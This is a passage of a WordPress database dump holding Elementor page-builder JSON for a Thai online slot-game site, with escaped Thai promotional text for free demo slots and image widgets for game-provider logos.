\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1382,169,'_thumbnail_id','61'),(1386,170,'_elementor_edit_mode','builder'),(1387,170,'_elementor_template_type','wp-page'),(1388,170,'_elementor_version','3.32.5'),(1389,170,'_elementor_pro_version','3.32.3'),(1390,170,'_wp_page_template','default'),(1391,170,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1392,170,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/demoslot\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 